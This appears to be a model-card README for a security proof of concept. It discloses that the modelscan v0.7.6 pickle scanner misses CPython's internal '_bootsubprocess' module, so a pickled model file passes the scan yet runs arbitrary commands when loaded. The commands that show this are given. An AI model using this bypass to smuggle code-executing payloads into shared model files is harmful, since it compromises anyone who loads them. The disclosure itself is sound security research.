metadata
tags:
- security-research
- proof-of-concept
license: mit
modelscan Bypass PoC: _bootsubprocess.Popen RCE
Security research only. Do not use maliciously.
This model file demonstrates a bypass of protectai/modelscan v0.7.6.
Vulnerability
modelscan blocks subprocess but does NOT block _bootsubprocess, a CPython internal module that provides the same Popen functionality.
Verification
# Scan - reports no issues
modelscan scan -p model.pkl
# But executes arbitrary commands on load
python3 -c "import pickle; pickle.load(open('model.pkl','rb'))"